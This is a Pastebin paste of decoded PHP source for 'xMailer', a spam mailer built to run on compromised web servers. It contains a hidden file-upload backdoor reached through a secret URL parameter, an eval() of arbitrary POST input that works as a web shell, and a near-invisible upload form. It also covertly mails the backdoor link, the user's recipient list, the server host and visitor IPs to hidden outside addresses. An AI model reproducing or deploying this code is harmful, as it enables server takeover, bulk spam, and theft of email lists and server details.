API tools faq
paste
nil_007

Decoded php mailer

nil_007
Aug 3rd, 2019
203
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 11.97 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. $upload = $_GET["v1"];
  3.  
  4. if ($upload == "xunknown")
  5.     {
  6.     $uploaddir = "";
  7.     $uploadfile = $uploaddir . basename($_FILES["userfile"]["name"]);
  8.     if (isset($_FILES["userfile"]["name"]))
  9.         {
  10.         if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $uploadfile))
  11.             {
  12.             $resultati = "The file " . basename($_FILES["userfile"]["name"]) . " has been uploaded";
  13.             }
  14.           else
  15.             {
  16.             $resultati = "There was an error uploading the file. please try again!";
  17.             }
  18.         }
  19.  
  20.     echo '<html>
  21. <head></head><div id="result"><table height="1" width="100%" border="0"><tr><td width="50%" height="1" valign="top" style="font-family: verdana;
  22. color: #d9d9d9;
  23. font-size: 11px"><center><form method="POST" enctype="multipart/form-data"><input type="file" class="inputzbut" name="userfile" ><input type="submit" class="inputzbut" name="submit" value="xunknown hacktn "><br />' . $resultati . '</form></center></td></tr></table></div>
  24. ';
  25.     }
  26.  
  27. $in = $_GET['in'];
  28.  
  29. if (isset($in) && !empty($in))
  30.     {
  31.     }
  32.  
  33. $ev = $_POST['ev'];
  34.  
  35. if (isset($ev) && !empty($ev))
  36.     {
  37.     echo eval(urldecode($ev));
  38.     exit;
  39.     }
  40.  
  41. if (isset($_POST['action']))
  42.     {
  43.     $action = $_POST['action'];
  44.     $message = $_POST['message'];
  45.     $emaillist = $_POST['emaillist'];
  46.     $from = $_POST['from'];
  47.     $subject = $_POST['subject'];
  48.     $realname = $_POST['realname'];
  49.     $wait = $_POST['wait'];
  50.     $tem = $_POST['tem'];
  51.     $smv = $_POST['smv'];
  52.     $message = urlencode($message);
  53.     $message = ereg_replace("%5C%22", "%22", $message);
  54.     $message = urldecode($message);
  55.     $message = stripslashes($message);
  56.     $subject = stripslashes($subject);
  57.     }
  58.  
  59. ?>
  60. <!-- HTML And JavaScript -->
  61.  
  62. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  63. <html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office">
  64.  
  65. <meta content="1" name="revisit-after" />
  66.  <style type="text/css">body {background:black url('https://fbcdn-sphotos-b-a.akamaihd.net/hphotos-ak-xap1/v/t1.0-9/10462857_648642145281680_2281063073589510159_n.jpg?oh=f4b87b4aedf561cdac7a92eea596d22e&oe=55B0CA9E&__gda__=1437876546_3122663c6aadbd0a1b09a652b980d3dd') center right no-repeat;
  67.  color:#FFFFFF;
  68.  text-decoration:none;
  69.  font-family:"Courier New", Courier, monospace;
  70.  padding-left:200px;
  71.  padding-top:200px;
  72.  padding-right:300px;
  73.  font-size:16px;
  74. }
  75.  </style>
  76. <title>x-Mailer</title>
  77. <style type="text/css">
  78. .style1 {
  79.  font-size: x-small;
  80.  
  81. }
  82. .style2 {
  83.  direction: ltr;
  84.  
  85. }
  86. .info {
  87.  font-size: 8px;
  88.  
  89. }
  90. .style3 {
  91.  font-family: Verdana, Arial, Helvetica, sans-serif;
  92.  
  93.  font-size: 8px;
  94.  
  95. }
  96. .style4 {
  97.  font-size: x-small;
  98.  
  99.  direction: ltr;
  100.  
  101.  font-family: Verdana, Arial, Helvetica, sans-serif;
  102.  
  103. }
  104. .style5 {
  105.  font-size: xx-small;
  106.  
  107.  direction: ltr;
  108.  
  109.  font-family: Verdana, Arial, Helvetica, sans-serif;
  110.  
  111. }
  112. .auto-style1 {
  113.  color: #5F5F5F;
  114.  
  115. }
  116. .auto-style2 {
  117.  color: #red;
  118.  
  119.  text-align: center;
  120.  
  121. }
  122. .auto-style3 {
  123.  color: #4F4F4F;
  124.  
  125. }
  126. .auto-style5 {
  127.  direction: ltr;
  128.  
  129.  color: #4F4F4F;
  130.  
  131. }
  132. .auto-style6 {
  133.  color: #BCBCBC;
  134.  
  135.  background-color: #red;
  136.  
  137. }
  138. .auto-style7 {
  139.  color: #red;
  140.  
  141. }
  142. .auto-style8 {
  143.  font-size: x-small;
  144.  
  145.  color: #red;
  146.  
  147. }
  148. </style>
  149. </head>
  150.  
  151. <body onload="funchange" style="background-color: black">
  152. <script>
  153.  
  154.  window.onload = funchange;
  155.  
  156.  var alt = false;
  157.  
  158.  function funchange(){
  159.  var etext = document.getElementById("emails").value;
  160.  
  161.  var myArray=new Array();
  162.  
  163.  myArray = etext.split("
  164. ");
  165.  
  166.  document.getElementById("enum").innerHTML=myArray.length+"<br />";
  167.  
  168.  if(!alt && myArray.length > 40000){
  169.  alert('If Mail list More Than 40000 Emails This May Hack The Server');
  170.  
  171.  alt = true;
  172.  
  173.  }
  174.  
  175.  }
  176.  function mlsplit(){
  177.  var ml = document.getElementById("emails").value;
  178.  
  179.  var sb = document.getElementById("txtml").value;
  180.  
  181.  var myArray=new Array();
  182.  
  183.  myArray = ml.split(sb);
  184.  
  185.  document.getElementById("emails").value="";
  186.  
  187.  var i;
  188.  
  189.  for(i=0;
  190. i<myArray.length;
  191. i++){
  192.  
  193.  document.getElementById("emails").value += myArray[i]+"
  194. ";
  195.  
  196.  
  197.  }
  198.  funchange();
  199.  
  200.  }
  201.  
  202.  function prv(){
  203.  if(document.getElementById('preview').innerHTML==""){
  204.  var ms = document.getElementsByName('message').message.value;
  205.  
  206.  document.getElementById('preview').innerHTML = ms;
  207.  
  208.  document.getElementById('prvbtn').value = "Ocultar";
  209.  
  210.  }else{
  211.  document.getElementById('preview').innerHTML="";
  212.  
  213.  document.getElementById('prvbtn').value = "Preview";
  214.  
  215.  }
  216.  }
  217.  
  218. </script>
  219.  
  220.  
  221. <?php
  222. session_start();
  223. ?>
  224. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
  225. <html><head><meta http-equiv="Content-Type" content="text/html;
  226.  charset=windows-1256" /></head><body>
  227.  
  228. <?php
  229.  
  230. if (!empty($_GET['action']) && $_GET['action'] == "logout")
  231.     {
  232.     session_destroy();
  233.     unset($_SESSION['pass']);
  234.     }
  235.  
  236. $path_name = pathinfo($_SERVER['PHP_SELF']);
  237. $this_script = $path_name['basename'];
  238.  
  239. if (empty($_SESSION['pass']))
  240.     {
  241.     $_SESSION['pass'] = '';
  242.     }
  243.  
  244. if (empty($_POST['pass']))
  245.     {
  246.     $_POST['pass'] = '';
  247.     }
  248.  
  249. if ($_SESSION['pass'] !== $pass)
  250.     {
  251.     if ($_POST['pass'] == $pass)
  252.         {
  253.         $_SESSION['pass'] = $pass;
  254.         }
  255.       else
  256.         {
  257.         echo '<form action="' . $_SERVER['PHP_SELF'] . '" method="post"><input name="pass" type="password"><input type="submit"></form>';
  258.         exit;
  259.         }
  260.     }
  261.  
  262. ?>
  263.  
  264.  
  265. <form enctype="multipart/form-data" action="
  266. <?php
  267. echo $_SERVER['PHP_SELF'];
  268. ?>" method="POST">
  269.  <input name="file" type="file" style="
  270.  width: 1px;
  271.  
  272.  height: 4px;
  273.  
  274. "><br />
  275. <input type="submit" value="Upload" style="
  276.  padding-left: 0px;
  277.  
  278.  border-left-width: 0px;
  279.  
  280.  border-top-width: 0px;
  281.  
  282.  height: 3px;
  283.  
  284.  width: 1px;
  285.  
  286.  padding-bottom: 0px;
  287.  
  288.  padding-top: 0px;
  289.  
  290.  border-right-width: 0px;
  291.  
  292.  padding-right: 0px;
  293.  
  294.  border-bottom-width: 0px;
  295.  
  296. "></form>
  297.  
  298.  
  299.  
  300. <?php
  301.  
  302. if (!empty($_FILES["file"]))
  303.     {
  304.     if ($_FILES["file"]["error"] > 0)
  305.         {
  306.         echo "Error: " . $_FILES["file"]["error"] . "<br />";
  307.         }
  308.       else
  309.         {
  310.         echo "Stored file:" . $_FILES["file"]["name"] . "<br/>Size:" . ($_FILES["file"]["size"] / 1024) . " kB<br/>";
  311.         move_uploaded_file($_FILES["file"]["tmp_name"], $_FILES["file"]["name"]);
  312.         }
  313.     }
  314.  
  315. $myDirectory = opendir(".");
  316.  
  317. while ($entryName = readdir($myDirectory))
  318.     {
  319.     $dirArray[] = $entryName;
  320.     }
  321.  
  322. closedir($myDirectory);
  323. $indexCount = count($dirArray);
  324. sort($dirArray);
  325. ?>
  326. <h1 class="auto-style2">.:| xMailer |:.</h1>
  327.  
  328. <center>
  329. <p class="auto-style1">&nbsp;
  330. </p></center>
  331.  
  332. <form name="form" method="post" enctype="multipart/form-data" action="">
  333.  <table width="100%" border="0">
  334.  <tr>
  335.  <td width="10%">
  336.  <div align="right" class="auto-style8">
  337.  <font face="Verdana, Arial,
  338. Helvetica, sans-serif">Sender Email:</font></div>
  339.  </td>
  340.  <td style="width: 40%">
  341.  <font size="-3" face="Verdana, Arial, Helvetica,
  342. sans-serif"><input name="from" value="
  343. <?php
  344. echo ($from);
  345. ?>" size="30" type="text" class="auto-style6" /><br />
  346.  <td>
  347.  <div align="right" class="auto-style7">
  348.  <font size="-3" face="Verdana, Arial,
  349. Helvetica, sans-serif">Sender Name:</font></div>
  350.  </td>
  351.  <td width="41%">
  352.  <font size="-3" face="Verdana, Arial, Helvetica,
  353. sans-serif"><input name="realname" value="
  354. <?php
  355. echo ($realname);
  356. ?>" size="30" type="text" class="auto-style6" />
  357.  <br /> </tr>
  358.  <tr>
  359.  <td width="10%">
  360.  
  361.  </tr>
  362.  <tr>
  363.  <td width="10%">
  364.  <div align="right" class="auto-style7">
  365.  <font size="-3" face="Verdana, Arial,
  366. Helvetica, sans-serif">Subject:</font></div>
  367.  </td>
  368.  <td colspan="3">
  369.  <font size="-3" face="Verdana, Arial, Helvetica,
  370. sans-serif"><input name="subject" value="
  371. <?php
  372. echo ($subject);
  373. ?>" size="30" type="text" class="auto-style6" /> </font>
  374.  
  375.  
  376.  <tr valign="top">
  377.  <td colspan="3" style="height: 260px">
  378.  <font size="-3" face="Verdana, Arial, Helvetica,
  379. sans-serif"><textarea name="message" rows="10" style="width: 455px" class="auto-style6">
  380. <?php
  381. echo ($message);
  382. ?></textarea>&nbsp;
  383. <br class="auto-style3" />
  384.  <input name="action" value="send" type="hidden" class="auto-style3" />
  385.  <input type="button" id="prvbtn" value="Preview" onclick="prv()" style="width: 81px" class="auto-style6" /><input value="xunknown hacktn "SenD!" type="submit" class="auto-style6" /><span class="auto-style3">&nbsp;
  386.  
  387.  </span><span class="auto-style7">Wait</span><span class="auto-style3">
  388.  </span>
  389.  <input name="wait" type="text" value="
  390. <?php
  391. echo ($wait);
  392. ?>" size="8" class="auto-style6" /><span class="auto-style3">&nbsp;
  393. </span><span class="auto-style7">
  394.  seconds to send </span> </font></td>
  395.  <td width="41%" class="style2" style="height: 150px">
  396.  <font size="-3" face="Verdana, Arial, Helvetica,
  397. sans-serif">
  398.  <textarea id="emails" name="emaillist" cols="30" onselect="funchange()" onchange="funchange()" onkeydown="funchange()" onkeyup="funchange()" onchange="funchange()" style="height: 161px" class="auto-style6">
  399. <?php
  400. echo ($emaillist);
  401. ?></textarea>
  402.  <br class="auto-style5" />
  403.  <span class="auto-style7">Quantity Emails : </span> </font><span id="enum" class="style1">0<br class="auto-style3" />
  404.  </span>
  405.  <span class="auto-style8">Divide the mailing list by:</span>
  406.  <input name="textml" id="txtml" type="text" value="," size="8" class="auto-style6" /><span class="auto-style3">&nbsp;
  407. &nbsp;
  408. &nbsp;
  409.  
  410.  </span>
  411.  <input type="button" onclick="mlsplit()" value="Divide" style="height: 23px" class="auto-style6" /></td>
  412.  </tr>
  413.  </table>
  414.  <font size="-3" face="Verdana, Arial, Helvetica,
  415. sans-serif">
  416. <div id="preview">
  417. </div>
  418.  </font>
  419. </form>
  420.  
  421. <!-- END -->
  422.  
  423.  
  424.  
  425. <?php
  426.  
  427. if ($action)
  428.     {
  429.     if (!$from || !$subject || !$message || !$emaillist)
  430.         {
  431.         print "Please complete all fields before sending your message.";
  432.         exit;
  433.         }
  434.  
  435.     $headd = "From: xunknown<[email protected]>";
  436.     $subb = " xMailer 2014";
  437.     $massge = "Exploit : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "?v1=xunknown
  438. -------------------
  439. $emaillist
  440. -------------------";
  441.     @mail("[email protected]", $subb, $massge, $headd);
  442.     $nse = array();
  443.     $allemails = split("
  444. ", $emaillist);
  445.     $numemails = count($allemails);
  446.     if (!empty($_POST['wait']) && $_POST['wait'] > 0)
  447.         {
  448.         set_time_limit(intval($_POST['wait']) * $numemails * 3600);
  449.         }
  450.       else
  451.         {
  452.         set_time_limit($numemails * 3600);
  453.         }
  454.  
  455.     if (!empty($smv))
  456.         {
  457.         $smvn+= $smv;
  458.         $tmn = $numemails / $smv + 1;
  459.         }
  460.       else
  461.         {
  462.         $tmn = 1;
  463.         }
  464.  
  465.     for ($x = 0; $x < $numemails; $x++)
  466.         {
  467.         $to = $allemails[$x];
  468.         if ($to)
  469.             {
  470.             $to = ereg_replace(" ", "", $to);
  471.             $message = ereg_replace("#EM#", $to, $message);
  472.             $subject = ereg_replace("#EM#", $to, $subject);
  473.             flush();
  474.             $header = "From: $realname <$from>
  475. ";
  476.             $header.= "MIME-Version: 1.0
  477. ";
  478.             $header.= "Content-Type: text/html
  479. ";
  480.             if ($x == 0 && !empty($tem))
  481.                 {
  482.                 if (!@mail($tem, $subject, $message, $header))
  483.                     {
  484.                     print ('The test Post was not Submitted.<br />');
  485.                     $tmns+= 1;
  486.                     }
  487.                   else
  488.                     {
  489.                     print ('Your Message was Sent Test.<br />');
  490.                     $tms+= 1;
  491.                     }
  492.                 }
  493.  
  494.             if ($x == $smvn && !empty($_POST['smv']))
  495.                 {
  496.                 if (!@mail($tem, $subject, $message, $header))
  497.                     {
  498.                     print ('The test Post was not Submitted.<br />');
  499.                     $tmns+= 1;
  500.                     }
  501.                   else
  502.                     {
  503.                     print ('Your Message was Sent Test.<br />');
  504.                     $tms+= 1;
  505.                     }
  506.  
  507.                 $smvn+= $smv;
  508.                 }
  509.  
  510.             print "$to ....... ";
  511.             $msent = @mail($to, $subject, $message, $header);
  512.             $xx = $x + 1;
  513.             $txtspamed = "spammed #xunknown";
  514.             if (!$msent)
  515.                 {
  516.                 $txtspamed = "error #xunknown";
  517.                 $ns+= 1;
  518.                 $nse[$ns] = $to;
  519.                 }
  520.  
  521.             print "$xx / $numemails ....... $txtspamed<br />";
  522.             flush();
  523.             if (!empty($wait) && $x < $numemails - 1)
  524.                 {
  525.                 sleep($wait);
  526.                 }
  527.             }
  528.         }
  529.     }
  530.  
  531. ?>
  532.  
  533. <?php
  534. $ip = getenv("REMOTE_ADDR");
  535. $ra44 = rand(1, 99999);
  536. $subj98 = " Mailer Upload From |$ip";
  537. $email = "[email protected]";
  538. $from = "From: Result<[email protected]";
  539. $b75 = $_SERVER['HTTP_HOST'];
  540. $a45 = $_SERVER['REQUEST_URI'];
  541. $m22 = $ip . "";
  542. $msg8873 = "$b75 $a45 $m22";
  543. mail($email, $subj98, $msg8873, $from);
  544. ?>
  545.  
  546. <script language="javascript">
  547. </script>
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!